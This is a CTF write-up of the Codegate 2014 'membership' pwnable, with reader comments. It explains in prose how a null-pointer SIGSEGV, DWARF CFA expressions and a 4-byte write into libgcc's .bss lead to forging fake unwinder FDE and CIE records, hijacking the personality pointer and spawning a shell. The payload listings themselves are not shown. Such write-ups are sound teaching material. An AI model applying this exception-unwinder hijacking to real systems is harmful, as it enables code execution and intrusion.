[Codegate 2014] membership (800pt pwnable) write-up

This is a write-up for 800 point pwnable challenge called ‘membership’ from Codegate CTF 2014 Pre-qual round. PPP was the only solver for this challenge during the competition, so I have decided to do a write-up for the challenge. Enjoy.  (awesie and ricky solved it during the competition.)

1. Challenge overview

You can download the copy of the binary here.
During the competition, we could ssh into one of their machines to exploit and read the flag.


As you can see, it’s a 32-bit ELF binary. So, let’s open it up in IDA and start reversing.

The program looks really simple. It just installs a couple signal handlers (specifically for SIGSEGV and SIGFPE) and calls a main (interesting) function, where it prompts us for the userid and password. Then, the program calculates SHA256 hash of the given password and compares with the stored hash. If the password hashes do not match, a runtime error exception is thrown and the program is aborted. If we pass in the correct password, we get a shell :)

Since guessing the correct password or cracking the hash is not viable option for us, we try to locate some other bugs that can be useful.

As highlighted above, the program dereferences a null pointer (*0 = 0) if the length of the password is greater than or equal to 16 bytes. Obviously it is going to trigger SIGSEGV, but do you remember what we said earlier about installing the signal handlers? And yes, one of them was SIGSEGV handler.

So, instead of crashing it miserably, the handler will be called.
Let’s examine what this handler does.

SIGSEGV handler installer

Now, if we look at the SIGSEGV_handler, we may think it doesn’t really do anything useful.
Note that it just fills up exception information and calls __cxa_throw to throw exception.

At this point, we could go on and explain what SIGFPE_handler does as well, but we’ll skip it since it’s not that interesting and is not needed for a successful exploitation.
You may ask… so, what’s left?


2. Vulnerability

Notice that this is a C++ program with exception throwing. We should check how C++ exception handling works.

It uses a thing called, DWARF, which is a standardized debugging data format for unwinding the stack and handling exceptions.

There was a CTF problem in the past that involved DWARF (called Khazad from Ghost in the Shellcode 2012): Check out these write-ups if you are interested!

Anyways, you can find DWARF information can be displayed by using binutils such as objdump or readelf:

Take a close look at the entry with “pc=08048fa7..0804904d”.
This entry basically describes what should happen when the exception is thrown between that PC range. Note that the SIGSEGV_handler throws an exception at 0x0804901A , which is in that range (that range is precisely  SIGSEGV_handler function).

Ok. Now, we have to make sense of what all those operations mean :)
DW_CFA_val_expression contains CFA expressions that are defined here.

Luckily, it’s not that hard to understand the expressions. We can simply think of it as a stack machine:

So, in short, it checks if the username is “stdchpie” and the password[2:5] is equal to “\xb1\x2e\x40”.
If any of the condition fails, it transfers execution to 0x8048f18 , which does exit(0) .

What happens if we satisfy the conditions? Good question.
It basically dumps us to the following code:

This code prints out “nested” string and writes password[5:9] to *password[1:5]. Meaning, we get to write anything in 0x402eb1??  address space with any 4 byte value we choose. 4-byte write is pretty strong tool in exploitation, but when we are limited to 256 byte range, it’s difficult to make it useful. Also, it immediately jumps to 0x8048cc0 , where it does another null pointer dereference causing SIGSEGV to happen — thus, we get infinite ‘nested’ string printed out.

Alright. Let’s summarize what we know and have so far.

  1. We can trigger a null pointer dereference, causing SIGSEGV handler to get executed (and thus, DWARF CFA expressions), by sending a password that’s >= 16 bytes.
  2. With carefully constructed password, we can overwrite any 4-byte value to any address in between 0x402eb100  and 0x402eb1ff .

The natural question is, then, what is mapped on that memory address?
With ulimit -s unlimited ,

As we can see above (highlighted), the address range falls into libgcc‘s memory — specifically, it matched portion of its .bss section.

So, what is there in libgcc_s.so.1, you ask.

Precisely, this.
And that’s it.

At this point, we downloaded and opened up libgcc source code to look at where some of these data structures are used, and tried to look for ways to get an EIP control.

So the journey begins.

3. libgcc source code analysis

Note that this step took the longest since we had to actually understand part of the gcc code when it does stack unwinding and handling the exception.

You can download the source for gcc here (gcc-4.8.1, Ubuntu 13.01).

During the competition, we chose each data structure of interest and traced backwards to find out whether by controlling said structure we can influence anything (e.g. function pointer) on callers while handling exceptions to hijack the control flow.

Since we now know which one can be used to control EIP, we will start from there: frame_hdr_cache_head is our target. [It is very well be possible to solve the challenge with different method/structure, but this is the one that we ended up using during the CTF.]

If we locate the place that frame_hdr_cache_head is referenced, we land in the middle of _Unwind_IteratePhdrCallback function in libgcc/unwind-dw2-fde.dip.c.

frame_hdr_cache_head points to the first element of a singly linked list that contains frame_hdr_cache_element(s).
The code iterates through the list and finds the entry for data->pc  in cache. data->pc  is the program counter of the frame we are trying to handle the exception for.

This cache is filled in as the program discovers exception handler frames (eh_frame).

The following is the struct definition for frame_hdr_cache_element:

So, if we control where frame_hdr_cache_head points to, we can also construct/control the elements inside. Before we dive into what happens when we find an element in the cache and ‘goto found‘, let’s step back for a minute and see if we can even get to here and what that allows us to do.

The function we just looked at (_Unwind_IteratePhdrCallback) is called from _Unwind_Find_FDE in unwind-dw2-fde-dip.c.
Then, _Unwind_Find_FDE function is called from uw_frame_state_for function in unwind-dw2.c.
uw_frame_state_for function is called from _Unwind_RaiseException function in unwind.inc, which provides an interface to raise an exception given an exception object.

Where does _Unwind_RaiseException get called, then?
It gets called by __cxa_throw, and if you remember, our SIGSEGV_handler invokes this function to raise an exception.

Alright. We now have confirmed that we can get to that code by causing the binary to throw an exception and letting libgcc unwinds/handles the exception.

But is there anything interesting in this code path such that we can give us EIP control? Yes.

Let’s review _Unwind_RaiseException a little bit:

Notice the highlighted lines. What do you see?

A function pointer getting called! And we *may* be able to control fs.personality .
Let’s find out!

Remember that the struct pointer that we are interested in tracing is fs (aka 2nd argument).
Wee see here that _Unwind_Find_FDE is used to get fde (which is used to get cie), and extract_cie_info takes cie and fs as its first and third argument, respectively.

So, what happens in extract_cie_info?

extract_cie_info parses cie and updates fs->personality . We’ll work out the details later.

Okay, now, we have to look into _Unwind_Find_FDE function to find out what it returns (fde) is:

As we discussed earlier, _Unwind_Find_FDE calls _Unwind_IteratePhdrCallback, which fills the data struct.
Then, it returns data.ret.

Whoa. After that chain of functions, we now came back to where we started — _Unwind_IteratePhdrCallback.
Warning: This is a really long function :p

To show a good idea of the call stack, here’s a diagram:

Fortunately, we do not have to look at all of its details. As we learned earlier, the cache for eh_frame_hdr is looked up and the following is performed in case the entry was found:

Note that data->ret  is set to f on line 415, where f is a FDE pointer found by performing binary search.
Comments from unwind-dw2-fde.h briefly describes FDE & CIE lookup:

Let’s review some of the primitive structs and functions that are used in above code to get a better understanding of what’s going on. We will make references to these as we explain the code later.

And, these are some functions that are used when parsing data:

That was a lot of stuff, but don’t worry about understanding/remembering all of them since we will go over the logic at somewhat high-level.

When an exception is thrown, the PC is looked up to find a correct FDE for the current function.

  1. First, they search the shared library cache linked-list (which we control the head pointer).
  2. Once the entry is found, they get unw_eh_frame_hdr (hdr variable) by adding p_vaddr and load_base. Then, they make sure the version of hdr is 1.
    • hdr also contains the flags for encoding schemes for eh_frame_ptr, fde_count, and table.
    • Encoding flag is defined in unwind-pe.h, but important ones are: DW_EH_PE_pcrel (0x10, pc-relative), DW_EH_PE_absptr (0x00, absolute),  DW_EH_PE_sdata4 (0x0b, signed 4 byte), DW_EH_PE_udata4 (0x03, unsigned 4 byte).
  3. Parse eh_frame and fde_count
  4. Perform binary search in table for the data->pc  against table[i].initial_loc + data_base , where data_base is hdr.
  5. When found an element in table, set f to table[mid].fde + data_base  (thus, calculating the FDE pointer).
  6. Final check is done by parsing the range to ensure that this FDE record covers data->pc
    ( table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range )
  7. data->ret  is filled with f.

It’s important to carefully construct a (fake) FDE record since it holds CIE_delta field, which is used to locate the CIE record to be parsed later (for personality function pointer).

Only piece that we haven’t visited yet is extract_cie_info, but we will visit it as we develop an exploit payload :)

4. Exploit development

Finally, we can start writing some evil awesome payload to pwn this binary.

Here’s our plan for the attack:

  1. Overwrite frame_hdr_cache_head (0x402eb118) to point to our stdin buffer (0x40025000 + 0x1c for skipping userid/password/padding).
  2. Construct fake structs:
    • cache_entry (frame_hdr_cache_element)
    • p_eh_frame_hdr (Elf32_Phdr)
    • hdr  (unw_eh_frame_hdr)
    • table (fde_table)
    • fde (dwarf_fde)
    • cie (dwarf_cide)
  3. When creating a fake cie struct, we make the personality function pointer 0x8048E97 , where it does execlp("/bin/sh", "/bin/sh", 0) , and get a shell!!

Note that the some of the fields in structs are relative offsets, so we need to plan where to put things and link them correctly.

4-1. Trigger

Let’s start with a simple payload that would pass the check and trigger the bug.

As we can see in action, this payload triggers the bug and causes infinite SIGSEGV.
We currently chose 0x402eb101 for no particular reason, but we can see that memory is successfully written.

4-2. cache_entry & p_eh_frame_hdr construction

Now, we overwrite frame_hdr_cache_head to point to our stdin buffer.

We are going to start building fake structs from our buffer + 0x1c.

So what values should we use?
To not worry about the search too much, we are going to set pc_low to 0x0 and pc_high to 0xFFFFFFFF. This basically says that this cache entry should be used for any exception thrown in this range of addresses — so we’ll catch everything. Also, to make it easy to do math, we are going to make load_base to 0. Finally, we have to set p_eh_frame_hdr pointer to the fake Elf32_Phdr struct. We will put this fake phdr struct right after our fake cache_entry struct that we are currently building. The rest of the fields are not really used (for our purpose), so we can put dummy values.

This gives us this:

For p_eh_frame_hdr struct, we only care about p_vaddr which is used to calculate hdr (unw_eh_frame_hdr).

Let’s see in action.

So, this payload basically lets us to execute goto found;  code (unwind-dw2-fde-dip.c:225) since the data->pc  will be in between pc_low and pc_high.

Then, on line 315, hdr is calculated by adding p_eh_frame_hdr->p_vaddr and load_base, thus pointing 0x40025054.
Time to build a fake hdr struct!

4-3. hdr & table construction

Starting at +0x54 from our buffer comes the hdr struct.
It’s a 4 byte struct and we fill in reasonable values here, according to the encoding scheme mentioned above.

Then, as we saw earlier, eh_frame is read. Since the value is supposedly encoded with  (DW_EH_PE_pcrel | DW_EH_PE_sdata4) , this value in our data should be an offset from where the hdr is. However, the value of eh_frame isn’t really related to what we do, so we can put any value (read_encoded_value_with_base actually does the calculation given the base to correctly compute eh_frame’s value).

Ok, next check is the following:

We have picked the values for encoding schems such that we satisfy both conditions.
Then, fde_count is read.
Since we do not want to create more than one set of fake structs (to be searched with binary search later), we will force this to be 1.

So with this data appended, we so far have this as our payload:

Then, the table comes next. fde_table struct has two fields: initial_loc and fde.

As mentioned earlier, in order for the search to succeed, we need to satisfy  table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range .

Note that data_base is pointing at hdr (0x40025054). So we can set initial_loc to 0xBFFDAFAC such that initial_loc + data_base == 0x40025054 + 0xBFFDAFAC  == 0x0 .

Also, the fde field is actually an (signed) offset from hdr — due to (DW_EH_PE_datarel | DW_EH_PE_sdata4) encoding. So, we set it to 0x14 to indicate that our fake dwarf_fde struct will be located at 0x40025068.

Fake hdr and table construction is done, and we now have this:

The current payload, when fed to the program, will result in a crash since it will read an invalid value for the range.
To make data->pc < initial_loc + data_base + range  true, we need to construct a fake dwarf_fde now.

4-4. fde & cie construction

As a final step, we are going to construct fde and cie records in our payload.

dwarf_fde struct has length, CIE_delta, and pc_begin fields (followed by fde_augmentation length, which should be 0).

We are going to make the length 0x1C, and CIE_delta to 0xFFFFFFE4 (such that &CIE_delta - CIE_delta == 0x40025088 — this will be explained later). We will set pc_begin to 0x0 (doesn’t really matter what we put here).

What comes after pc_begin is the range. To explain a little bit, on line 412 in unwind-dw2-fde-dip.c, range is read from f->pc_begin[f_enc_size] where f_enc_size is 4, making the 4 byte right after pc_begin be the range. Since we made the init_loc to be 0x0, we will make the range to be 0xFFFFFFFF. Then, we pad the last few bytes (so, technically we can fix the length, but that’s what we used during the competition).

This yields our payload to be:

We are almost there!!!

Above payload will result in data->ret  to contain a pointer to our FDE struct and return to _Unwind_Find_FDE.

In _Unwind_Find_FDE, nothing interesting happens, and the same (a pointer to our fake FDE struct) is returned.

We are now back to uw_frame_state_for function (line 1180 in unwind-dw2.c). Since fde is not null, extract_cie_info is called with the cie pointer that is based on our fde.

Looking at the get_cie function, we can see why we put 0xFFFFFFE4 for CIE_delta value in our FDE struct. With our setup, get_cie will return the CIE struct’s address, which will be right after our fake FDE struct (aka 0x40025088).

Now, we have 1 final function that we need to understand: extract_cie_info.

This function is mostly parsing stuff and filling in the _Unwind_Frame_State data based on the CIE record.

dwarf_cie struct has length, CIE_id, version, and augmentation — and depending on augmentation content, more data follows.

Here’s the values we set for our fake CIE struct:

Data that follows after augmentation string (code_alignment, data_alignment, return_addr_col) are read in first.
We chose these values just because we saw these in normal CIE struct, but it shouldn’t matter what the values are.

Then, the rest of the data is parsed as augmentation contents (aka ‘zPLR’).

  1. If the first byte is ‘z’, it sets fs->saw_z flag  and note that the length of the extra augmentation data (which follows the length itself) is 0x07.
  2. ‘P’ indicates a personality routine  is specified in CIE (extra) augmentation, and basically read the personality_ptr value (4-byte) based on the personality_enc encoding scheme — which we set as 0x0 to make it absptr type.
  3. ‘L’ indicates a byte showing how the LSDA pointer is encoded. No idea what that is, but it’s not relevant — we put 0x0.
  4. ‘R’ indicates a byte indicating how FDE addresses are encoded. We put some sane value that we saw earlier, but shouldn’t matter either.

Alright, now with some padding bytes to make the total length 0x1c, we are set.

Thus far, we have built the following payload:

And corresponding output when we run this payload against the binary:

YAY!!! WE HAVE EIP CONTROL!!!!111!!11!

Ok, now on to the final and easiest step: getting a shell.

4-5. Give me a shell

Remember (from a while ago…) that there was code that does execlp("/bin/sh", "/bin/sh", 0) ?
For those who don’t remember, it’s located at  0x8048E97 .

All we have to do at this point is to replace 0x41424344 (personality routine pointer) to 0x8048e97.


Voila! We have our shell (and the flag, of course!)


5. Closing

I hope you enjoyed reading this write-up. (Although I suspect not.. due to its obscene length)

I apologize that this ended up being a LOT longer than I anticipated when I started writing, but I think it contains quite a bit of details that people can follow and reproduce the result.

Try it while their server is up!! Otherwise you will have to patch the binary such that the addresses work out.

Thank you for reading, and feel free to leave comments if you have any questions or suggestions.



You may also like...

6 Responses

  1. Zerith says:

    Awesome writeup. Thanks for this.

  2. jinmo123 says:

    awesome! thanks!!

  3. TresMignon says:

    Hi, thanks for your wonderful writeup!
    Would you mind if I ask you couple questions?
    I’m new to DWARF and I don’t understand how you analyze DW_OP_bra,
    “the number of bytes of the DWARF expression to skip forward or backward”, it says in the documentation.
    DW_OP_bra 50 , DW_OP_bra 29 and DW_OP_bra 8 all jumped to END in your example,
    but I couldn’t figure out how to calculate that T_T.
    Also, how do you find out that when you satisfy all conditions,
    the SIGSEV exception handler dumps to 0x08048CE8? Thank you very much :)

    • Cai says:

      Sure thing!
      DW_OP_bra is a branch expression which tells you how many bytes of DWARF expression it needs to skip. So if you count the bytes from each of branch instruction, you can see that it’s pointing to the END in my example. We just found out it dumps you there since you see ‘nested’ printed out and set a breakpoint to double check.

  4. PetitCochon says:

    WOW!!! Great job..

  5. jojo says:

    Amazing stuff .. keep a good work..

    bye N.

Leave a Reply

Your email address will not be published. Required fields are marked *